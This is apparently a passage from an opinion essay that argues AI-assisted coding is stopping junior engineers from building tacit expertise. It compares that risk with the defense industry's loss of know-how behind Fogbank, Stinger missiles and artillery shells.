But crises don't send calendar invites. Nobody expected a full-scale land war in Europe in 2022. The defense industry had thirty years to prepare and didn't. Even Fogbank had records. There weren't enough. The original workers didn't fully understand their own process.

Five to ten years from now, we'll need senior engineers. People who understand systems end to end, who can debug distributed failures at 2 AM, who carry institutional knowledge that exists nowhere in the codebase. Those engineers don't exist yet because we're not creating them. The juniors who should be learning right now are either not being hired or are developing what a DoD-funded workforce study calls "AI-mediated competence." They can prompt an AI. They can't tell you what the AI got wrong.

It's Fogbank for code. When juniors skip debugging and skip the formative mistakes, they don't build the tacit expertise. And when my generation of engineers retires, that knowledge doesn't transfer to the AI.

It just disappears.

The West already made this mistake once. The bill came due in Ukraine.

I know how this sounds. I know I've written about the talent pipeline before. The defense example isn't about repeating the argument. It's about showing what happens if the industry's expectations don't work out. Stinger, Javelin, Fogbank, a million shells nobody could make. That's the cost of betting wrong on optimization. We're making the same bet with software engineering right now.

Maybe AI gets good enough, and the bet pays off. Maybe it doesn't. The defense industry thought peace would last forever, too.
